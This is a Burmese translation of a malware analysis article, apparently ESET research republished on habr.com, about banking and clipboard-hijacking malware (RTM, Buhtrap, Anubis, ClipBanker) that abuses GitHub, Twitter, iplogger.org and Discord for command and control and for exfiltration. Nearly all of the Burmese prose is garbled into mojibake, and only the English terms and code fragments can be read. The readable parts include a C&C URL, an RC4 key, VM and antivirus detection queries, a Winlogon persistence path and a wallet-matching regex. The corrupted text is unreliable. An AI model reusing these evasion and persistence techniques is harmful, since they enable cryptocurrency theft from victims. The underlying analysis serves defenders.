áºáá¯áááºážáá±á¬ ááá¹ááá¬ážááŸá¬ string encryption ááŒá áºáááºá á¡á±á¬áºááá±áá¬ááá¯ááºáá¶á¡áááºááááºá á¬áá»á¬ážááᯠRC4 á¡áá¯á¶ážááŒá¯á áá¯ááºááŸááºáá¬ážáááºá áá áºááŸáẠcryptocurrencies áá»á¬ážááẠBitcoiná Bitcoin ááœá±áá¬ážá Dogecoiná Ethereum ááŸáá·áº Ripple ááá¯á·ááŒá áºáááºá
Malware ááẠááá¯ááºááá¯ááºáá°áá»á¬ážá Bitcoin ááá¯ááºáá¶á¡áááºáá»á¬ážááá¯á· áá»á¶á·ááŸá¶á·áá±áá»áááºá¡ááœááºážá áááºááááºážáá¡á±á¬ááºááŒááºááŸá¯ááᯠáá¶ááááŒá áºá á±ááá·áº VTS ááá¯á· ááá¬áá¡áááºážáááºááᯠáá±ážááá¯á·áá²á·áááºá ááá¯á·á¡ááŒááºá á€ááœá±áá±ážááœá±áá°áá»á¬ážááẠClipBanker ááŸáá·áº áá¯á¶ážááááºá ááºáá±ááŒá±á¬ááºáž áááºáá±ááŒááẠá¡áá±á¬ááºá¡áá¬ážáááŸááá«á
Win32/RTM
Win32/RTM á¡á
áááºá¡ááá¯ááºážááᯠáááºá 2019 á¡á
á±á¬ááá¯ááºážááœáẠáááºá¡áá±á¬áºááŒá¬ ááŒáá·áºáá±áá²á·áááºá RTM ááẠáá±ážáá¶áá±á«ááºáá®áá±á¬ áááºáá¯ááºáááºážá
áá
áºáá»á¬ážá¡ááœáẠáááºááœááºá Delphi ááœáẠáá±ážáá¬ážáá¬ážáá±á¬ Trojan áááºáá¯ááºáááºážááŸááºááŒá
áºáááºá 2017 áá¯ááŸá
áºááœáẠESET áá¯áá±áá®áá»á¬ážááá¯ááºáá±áá²á·áááºá
Buhtrap Loader
ááááºá Buhtrap áááááá¬áá»á¬ážááŸáá·áº ááá°áá±á¬ áá±á«ááºážáá¯ááºáááááá¬ááᯠGitHub ááœáẠá¡áá»áááºá¡áááºááŒá¬ áááá¯ááºáááºá áá°ááŸáá·áºááŒáá·áºáááºá https://94.100.18[.]67/RSS.php?<some_id>
áá±á¬ááºáá
áºááá·áºáááºááá¯á·áá²á· memory áá²ááᯠááá¯ááºááá¯ááºáááºáá«á áá¯áááá¡ááá·áºáá¯ááºá á¡ááŒá¯á¡áá°ááŸá
áºáá¯ááᯠááœá²ááŒá¬ážááá¯ááºáááºá ááá URL ááœááºá RSS.php ááẠBuhtrap backdoor ááᯠááá¯ááºááá¯ááºáá»á±á¬áºááœá¬ážááẠ- ဠbackdoor ááẠsource code áá±á«ááºááŒá¬ážááŒá®ážáá±á¬áẠáááŸáááá¯ááºááá·áºá¡áá¬ááŸáá·áº á¡ááœááºáááºáá°áááºá
á
áááºáááºá
á¬ážá
áá¬ááŸá¬á Buhtrap backdoor ááŒáá·áº áááºááááºážáá»á¬ážá
áœá¬ááᯠáá»áœááºá¯ááºááá¯á·ááœá±á·ááŒááºáááŒá®áž áááºážááá¯á·ááᯠááá°áá®áá±á¬ á¡á±á¬áºááá±áá¬áá»á¬ážá áá¯ááºáá±á¬ááºáááºáᯠá
áœááºá
áœá²áá¬ážáááºá á€ááá
á¹á
ááœááºá á¡áááááŒá¬ážáá¬ážáá»ááºááŸá¬ backdoor ááẠmemory áá²ááá¯á· ááá¯ááºááá¯ááºáááºááŒá®áž áá»áœááºá¯ááºááá¯á·ááŒá±á¬áá²á·áá±á¬ DLL ááŒáá·áºáá»ááºááŸá¯áá¯ááºáááºážá
ááºááŸáá·áºá¡áá° áá¯á¶ááŸááºá¡á
á®á¡á
á¥áºááᯠá¡áá¯á¶ážáááŒá¯ááŒááºážááŒá
áºáááºá
áá¯áááá ááá¯ááŸá¯ááºááœá±ážáá±á¬ á¡ááŒá¯á¡áá°ááŸá¬ RSS.php URL ááᯠá¡ááŒá¬áž loader ááá¯á· ááœáŸá²ááŒá±á¬ááºážáá±ážááŒááºážááŒá
áºáááºá áááºážááẠááŒá±á¬ááºážáá²áá±áá±á¬ áááºááœááºážááŸá¯ááá¬ážááᯠááŒááºáááºáááºáá±á¬ááºááŒááºážáá²á·ááá¯á·áá±á¬ ááŸá¯ááºááœá±ážááŸá¯á¡áá»áá¯á·ááᯠáá¯ááºáá±á¬ááºáá²á·áááºá bootloader ááááºááœááºáá»ááºááŸá¬ C&C áá¬áá¬ááá¯áááºááœááºáááºááŒá
áºáááºá
Android/Spy.Banker
á áááºáááºá á¬ážá áá¬ááŸá¬ Android á¡ááœáẠá¡á áááºá¡ááá¯ááºážáá áºáá¯ááᯠGitHub ááá¯ááŸá±á¬ááºááŸá¯ááœáẠááœá±á·ááŸááá²á·áááºá áá°ááẠáááá áá¯ááŸá áºá ááá¯áááºáá¬á á ááẠ- áááºááá¬áááœá²ááœáẠáá áºáááºáá¬ááŸááá²á·áááºá GitHub ááœáẠááá¯á·á áºáááºááŒááºážááŸááœá²á ESET telemetry ááẠဠmalware ááŒáá·áºáá±áá±ááá·áº á¡áá±á¬ááºá¡áá¬ážááᯠáááœá±á·ááŸáááá«á
á¡á áááºá¡ááá¯ááºážááᯠAndroid á¡ááá®áá±ážááŸááºáž áááºáá±á·áá»áº (APK) á¡ááŒá Ạáááºáá¶áá¬ážáááºá á¡ááœááºááŸá¯ááºááœá±ážáá±áá«áááºá APK ááŸá áá¯ááºááŸááºáá¬ážáá±á¬ JAR ááœáẠá¡áá¹ááá¬ááºááŸááá±á¬ á¡ááŒá¯á¡áá°ááᯠááŸááºáá¬ážáááºá á€áá±á¬á·ááá¯á¡áá¯á¶ážááŒá¯á áááºážááᯠRC4 ááŒáá·áº áá¯ááºááŸááºáá¬ážáááºá
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
áá°áá®áá±á¬áá±á¬á·ááŸáá·áº á¡ááºáááá¯áá®áááºááᯠá
á¬ááŒá±á¬ááºážáá»á¬ážááᯠá
á¬ááŸááºááẠá¡áá¯á¶ážááŒá¯áááºá JAR ááœááºáááºááŸááááºá APK_ROOT + image/files
. ááá¯ááºáááá 4 bytes ááœáẠá¡ááŸááºá¡ááœááºááŒá®ážáá±á¬áẠáá»ááºáá»ááºážá
áááºááá·áº áá¯ááºááŸááºáá¬ážáá±á¬ JAR áá¡ááŸááºáá«ááŸááááºá
ááá¯ááºááᯠáá¯ááºááŸááºáá¬ážááŒááºážááŒáá·áº áááºážááẠAnubis ááŒá
áºááẠ- ááááºá ááœá±á·ááŸááá²á·áááºá
- ááá¯ááºáááá¯áá¯ááºáž ááŸááºáááºážáááºááŒááºážá
- áááºáá¬ážááŒááºáá¬ááºáá¯á¶áá»á¬ážááá¯ááºááŒááºážá
- GPS ááŒááááááºáá»á¬ážááᯠááá°ááŒááºážá
- áá®ážáá±á¬á·ááºáá«
- á ááºáá á¹á ááºážáá±áᬠáá¯ááºááŸááºááŒááºážááŸáá·áº ááœá±ážáá¯ááºááá¯áž áá±á¬ááºážááá¯ááŸá¯
- spam áá±ážááá¯á·ááŒááºážá
á áááºáááºá á¬ážá áá¬ááŸá¬ áááºáá¯ááºáááºážááŸááºááẠá¡ááŒá¬ážáá±á¬ C&C áá¬áá¬ááᯠááá°ááẠá¡áááºáááºááœááºáá±ážáááºážááŒá±á¬ááºážá¡ááŒá ẠTwitter ááᯠá¡áá¯á¶ážááŒá¯áá²á·áááºá áá»áœááºá¯ááºááá¯á· ááœá²ááŒááºážá áááºááŒá¬ááá·áºááá°áá¬ááẠ@JonesTrader á¡áá±á¬áá·áºááᯠá¡áá¯á¶ážááŒá¯áá¬ážáá±á¬áºáááºáž ááœá²ááŒááºážá áááºááŒá¬ááá·áºá¡áá»áááºááœáẠáááºážááᯠááááºááá¯á·áá¬ážááŒá®ážááŒá áºáááºá
áááºáá¯ááºáááºážááŸááºááẠAndroid á ááºáá á¹á ááºážáá±á«áºááŸá áá áºááŸááºá¡ááá®áá±ážááŸááºážáá»á¬ážá á¬áááºážáá«ááŸááááºá áááºážááẠSophos áá±á·áá¬ááŸá¯ááœááºáááŸááá±á¬á á¬áááºážááẠááá¯ááŸááºáááºá á á¬áááºážááœáẠáááºáá¯ááºáááºážááá¯ááºáᬠá¡ááºááºáá®áá±ážááŸááºážáá»á¬ážá áœá¬á Amazon ááŸáá·áº eBay áá²á·ááá¯á·áá±á¬ á¡áœááºááá¯ááºážá á»á±ážáááºáááá¯ááááºáá»á¬ážááŸáá·áº cryptocurrency áááºáá±á¬ááºááŸá¯áá»á¬áž áá«áááºáááºá
MSIL/ClipBanker.IH
á€áááºááááºážááá áºá áááºáá áºááá¯ááºážá¡ááŒá ẠááŒáá·áºáá±áá¬ážáá±á¬ áá±á¬ááºáá¯á¶ážá¡á áááºá¡ááá¯ááºážááŸá¬ .NET Windows executable ááŒá áºááŒá®ážá áááºá 2019 ááœááºáá±á«áºáá¬áááºá áá±á·áá¬áá¬ážáá±á¬áá¬ážááŸááºážá¡áá»á¬ážá á¯ááᯠConfuserEx v1.0.0 ááŒáá·áºáá¯ááºááá¯ážáá¬ážáááºá ClipBanker áá²á·ááá¯á·áááºá á€á¡á áááºá¡ááá¯ááºážááẠááá áºáá¯ááºááᯠá¡áá¯á¶ážááŒá¯áááºá áá°ááááºážááá¯ááºááẠáá»ááºááŒáá·áºáá±á¬ cryptocurrencies áá»á¬ážá¡ááŒáẠSteam ááœáẠáááºážááŸááºážáá»ááºáá»á¬ážááŒá áºáááºá ááá¯á·á¡ááŒááºá áá°ááẠBitcoin áá®ážááá·áº WIF áá±á¬á·ááá¯ááá¯ážáá°ááẠIP Logger áááºáá±á¬ááºááŸá¯ááá¯á¡áá¯á¶ážááŒá¯áááºá
áá¬ááœááºááŸá¯ ááá¹ááá¬ážáá»á¬áž
ConfuserEx ááẠá¡ááŸá¬ážááŸá¬ááŒááºááŒááºážá ááŒáŸááºááŸá¶ááŒááºážááŸáá·áº áááºáá±á¬á·ááŒááºážááá¯á·ááᯠáá¬ážáá®ážáá¬ááœáẠáá¶á·ááá¯ážáá±ážááá·áº á¡áá»áá¯ážáá»á±ážáá°ážáá»á¬ážá¡ááŒááºá á¡á
áááºá¡ááá¯ááºážááœáẠááá¯ááºážáááºá
áºááŸáááºáááºážáá±áž áá¯ááºáá¯ááºáá»á¬ážááŸáá·áº á¡áá¯á¡áá±á¬áẠá
ááºáá»á¬ážááᯠááŸá¬ááœá±ááá¯ááºááŸá¯ áá«áááºáááºá
áááºážááẠvirtual machine áá áºáá¯ááœááºá¡áá¯ááºáá¯ááºááŒá±á¬ááºážá¡áááºááŒá¯áááºá malware ááẠBIOS á¡áá»ááºá¡áááºááá¯áá±á¬ááºážááá¯ááẠbuilt-in Windows WMI command line (WMIC) ááá¯á¡áá¯á¶ážááŒá¯ááẠ-
wmic bios
ááá¯á·áá±á¬áẠáááá¯ááááºááẠá¡áááá·áºáá±ážááá·áºá¡ááœááºááᯠááœá²ááŒááºážá áááºááŒá¬ááŒá®áž VBOXá VirtualBoxá XENá qemuá bochsá VM áá±á¬á·áá»ááºá á¬áá¯á¶ážáá»á¬ážááᯠááŸá¬ááœá±áááºá
ááá¯ááºážáááºá
áºááŸáááºáááºážáá±áž áá¯ááºáá¯ááºáá»á¬ážááᯠáá±á¬ááºááŸááºážáááºá Malware ááẠWindows Management Instrumentation (WMI) áá±á¬ááºážááá¯áá»ááºááᯠá¡áá¯á¶ážááŒá¯á Windows Security Center ááá¯á· áá±ážááá¯á·áááºá ManagementObjectSearcher
API ááᯠá¡á±á¬ááºááŸá¬ ááŒáá¬ážáááá¯áá«áá²á base64 á០áá¯ááºááŒá±á¬ááºážááŒá®ážáá±á¬áẠáá±á«áºááá¯ááŸá¯ááẠá€áá²á·ááá¯á· ááŒá
áºáá¯á¶ááááºá
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
áá¯á¶ 3á ááá¯ááºážáááºá
Ạááá¯ááºáá»ááºáá±áž áá¯ááºáá¯ááºáá»á¬ážááᯠááœá²ááŒá¬ážáááºááŸááºááŒááºáž áá¯ááºáááºážá
ááºá
ááá¯á·á¡ááŒáẠmalware ááŸááááŸáááá¯áááºážá
á
áºáá±ážáááºá
á áœá²ááŒá²á áœá¬
áá»áœááºá¯ááºááá¯á·áá±á·áá¬áá²á·áá±á¬ malware áá¬ážááŸááºážááᯠáá°ááá¯ááºááá¯áẠáá°ážáá°áá¬ážáá«áááºá %APPDATA%googleupdater.exe
ááŸáá·áº google directory á¡ááœáẠ"hidden" attribute ááᯠáááºááŸááºáááºá ááá¯á·áá±á¬áẠáááºááá¯ážááᯠááŒá±á¬ááºážáá²ááá¯ááºáááºá SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
Windows registry ááœáẠáááºážááŒá±á¬ááºážááᯠáá±á«ááºážááá·áºáááºá updater.exe
. á€áááºážá¡á¬ážááŒáá·áºá á¡áá¯á¶ážááŒá¯áá°ááẠáááºáá±á¬ááºááá·áºá¡áá«ááá¯ááºáž Malware áá»á¬ážááᯠáá¯ááºáá±á¬ááºáááºááŒá
áºáááºá
á¡ááŒá¶á¡áááºááŒá¯ááŸá¯
ClipBanker áá²á·ááá¯á·áááºá malware ááẠááá áºáá¯ááºá á¡ááŒá±á¬ááºážá¡áá¬áá»á¬ážááᯠá á±á¬áá·áºááŒáá·áºááŒá®áž cryptocurrency ááá¯ááºáá¶á¡áááºááááºá á¬áá»á¬ážááᯠááŸá¬ááœá±ááŒá®áž ááœá±á·ááŸááá«á áááºážááᯠá¡á±á¬áºááá±áá¬áááááºá á¬áá áºáá¯ááŒáá·áº á¡á á¬ážááá¯ážáááºá á¡á±á¬ááºááœááºáá±á¬áºááŒáá¬ážáááºááŸá¬ áá¯ááºááœááºááœá±á·ááŸáááá±á¬á¡áá¬á¡áá±á«áºá¡ááŒá±áá¶á áá áºááŸááºááááºá á¬áá»á¬ážá á¬áááºážááŒá áºáááºá
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
ááááºá á¬á¡áá»áá¯ážá¡á á¬ážáá áºáá¯á á®á¡ááœáẠáááºááá¯ááºáá¬áá¯á¶ááŸááºá¡áá¯á¶ážá¡ááŸá¯ááºážáá áºáá¯ááŸááááºá STEAM_URL áááºááá¯ážááᯠSteam á áá áºá¡á¬áž ááá¯ááºááá¯ááºáááºá¡ááœáẠá¡áá¯á¶ážááŒá¯áá¬ážáááºá ááŒá¬ážáá¶ááœáẠáááºááŸááºááẠá¡áá¯á¶ážááŒá¯ááá·áº áá¯á¶ááŸááºá¡áá¯á¶ážá¡ááŸá¯ááºážá០ááœá±á·ááŒááºááá¯ááºáááº-
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
Exfiltration áá»ááºáááº
ááŒá¬ážáá¶ááŸáááááºá á¬áá»á¬ážááᯠá¡á á¬ážááá¯ážááŒááºážá¡ááŒááºá malware ááẠBitcoiná Bitcoin Core ááŸáá·áº Electrum Bitcoin ááá¯ááºáá¶á¡áááºáá»á¬ážá áá®ážááá·áº WIF áá±á¬á·áá»á¬ážááᯠáá áºááŸááºáá¬ážáááºá áááá¯ááááºááẠWIF áá®ážááá·áºáá±á¬á·ááᯠááá°ááẠáááºááŸá¬ážáá±ážáá»ááºáááºáá áºáá¯á¡ááŒá Ạplogger.org ááᯠá¡áá¯á¶ážááŒá¯áááºá ááá¯ááá¯á·áá¯ááºáá±á¬ááºáááºá á¡á±á¬áºááá±áá¬áá»á¬ážááẠá¡á±á¬ááºááœááºááŒáá¬ážááá·áºá¡ááá¯ááºáž User-Agent HTTP áá±á«ááºážá á®ážááá¯á· áá»áŸáá¯á·ááŸááºáá±á¬á·áá±áá¬ááᯠáá±á«ááºážááá·áºáááºá
áá¯á¶ 4. á¡ááœááºáá±áá¬áá«ááŸááá±á¬ IP Logger ááœááºááá¯ážááºá
á¡á±á¬áºááá±áá¬áá»á¬ážááẠiplogger.org ááá¯á¡áá¯á¶ážáááŒá¯áá² ááá¯ááºáá¶á¡áááºáá»á¬ážááᯠáááºáá¯ááºáááºá á¡ááœááºáá²ááœáẠá
á¬áá¯á¶áž 255 áá¯á¶áž ááá·áºáááºáá»ááºááŒá±á¬áá·áº áááºážááá¯á·ááẠááá°áá®áá±á¬áááºážáááºážááᯠá¡áá¯á¶ážááŒá¯áá²á·ááŒááºáž ááŒá
áºááá¯ááºáááºá User-Agent
IP Logger áááºá¡ááºáá¬áá±á·á
áºááœááºááŒááá¬ážáááºá áá»áœááºá¯ááºááá¯á·áá±á·áá¬áá²á·ááá·áºááá°áá¬áá»á¬ážááœáẠá¡ááŒá¬ážá¡ááœááºáá¬áá¬ááᯠáááºáááºážáá»ááºááŒá±á¬ááºážáá²ááá¯ááºáá±á¬áá¯á¶á
á¶ááœáẠááááºážáááºážáá¬ážáááºá DiscordWebHook
. á¡á¶á·ááŒá
áá¬áá±á¬ááºážáá¬áá áá®áááºáááºážáá»áẠááááºážááŸááºááᯠáá¯ááºáá²á· áááºáá±áá¬ááŸá¬á០áá¬áááºááá±ážáá«áá°ážá áááºážááẠmalware ááẠááœá¶á·ááŒáá¯ážááá¯ážáááºáá²ááŒá
áºááŒá®áž ááááºážááŸááºá¡á¬áž á¡á±á¬áºááá±áá¬á á
ááºážáááºá
ááºááœáẠáá¬áááºáá±ážá¡ááºáá¬ážááŒá±á¬ááºáž ááœáŸááºááŒáááºá
áááá¯ááááºááẠááœá¶á·ááŒáá¯ážáá²ááŒá áºááŒá±á¬ááºáž á¡ááŒá¬ážááá¹ááá¬áá áºáááºááŸááá±ážáááºá ááœáááá¯ááºááœáẠiplogger.org URL ááŸá áºáá¯áá«áááºááŒá®áž áá±áá¬áá»á¬ážááᯠáááºááŸá¬ážááá¯ááºáá±á¬á¡áá« ááŸá áºáá¯áá¯á¶ážááᯠáá±ážááŒááºážáááºááŒá áºáááºá ဠURL áá»á¬ážáá²á០áá áºáá¯ááá¯á· áá±á¬ááºážááá¯ááŸá¯áá áºáá¯ááœááºá ááá¯ážáá¬ážáá°á¡ááœááºááŸá áááºááá¯ážááẠâDEV /â á ááŸá±á·ááœáẠááŸááá±áááºá ConfuserEx ááᯠá¡áá¯á¶ážááŒá¯á ááá¯ááºááá¯ážáá¬ážáá±á¬ áá¬ážááŸááºážááá¯áááºáž ááœá±á·ááŸááá²á·ááŒá®ážá ဠURL á¡ááœáẠáááºáá¶áá°ááᯠDevFeedbackUrl áá¯áá±á«áºáááºá áááºáááºážáá»ááºááŒá±á¬ááºážáá²ááá¯ááºáá±á¬á¡áááºááá¯á¡ááŒá±áá¶á á¡á±á¬áºááá±áá¬áá»á¬ážááẠcryptocurrency ááá¯ááºáá¶á¡áááºáá»á¬ážááá¯ááá¯ážáá°áááºá¡ááœááºááá¬ážáááºáááºáá±á¬ááºááŸá¯ Discord ááŸáá·áº áááºážááááºááŒá¬ážááŒááºá áá áºááá¯á·ááá¯á¡áá¯á¶ážááŒá¯áááºá á®á ááºáá¬ážááŒá±á¬ááºážáá»áœááºá¯ááºááá¯á·áá¯á¶ááŒááºáá«áááºá
áá±á¬ááºáá»ááº
á€áááºááááºážááẠááá¯ááºáá¬ááá¯ááºááá¯ááºááŸá¯áá»á¬ážááœáẠááá¬ážáááºááŒá±á¬áºááŒá¬áááºáá±á¬ááºááŸá¯áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯ááŒááºážá á¥ááá¬áá áºáá¯ááŒá áºáááºá á¡ááá¯áá« á¡á á®á¡á ááºááẠáá¯ááŸá¬ážá¡ááœá²á·á¡á ááºážáá»á¬ážááᯠáá áºááŸááºáá¬ážáá±á¬áºáááºáž áá¯ááŸá¬ážááá¯ááºáá±á¬ áááºáá±á¬ááºááŸá¯áá»á¬ážááᯠá¡áá¯á¶ážááŒá¯áᬠááá¯áá²á·ááá¯á· ááá¯ááºááá¯ááºááŸá¯ááᯠááŒááºááœá±á·áááŒááºážááŸá¬ áá»áœááºá¯ááºááá¯á· á¡á¶á·ááŒáááºááá¯ááºáá«á á¡áá±ážá¡áá°ááᯠááŸá±á¬ááºááŸá¬ážáááºá á¡áá¯á¶ážááŒá¯áá°áá»á¬ážááẠáááºážááá¯á·áá±á«ááºážáá¯ááºáá¯ááºáá¬ážáá±á¬ áá±á¬á·ááºáá²ááºá á¡áááºážá¡ááŒá áºá áá¯ááºááááºážááᯠáá¯á¶ááŒááºááŸá¯ááŸáááá«áááºá
á¡áá±ážá¡áá° á¡ááœáŸááºážááááºážáá»á¬ážááŸáá·áº MITER ATT&CK áááºááœáŸááºážáá»ááºáá»á¬áž á¡ááŒáá·áºá¡á
á¯á¶á
á¬áááºážááᯠááœáẠáááá¯ááºáá«áááºá
source: www.habr.com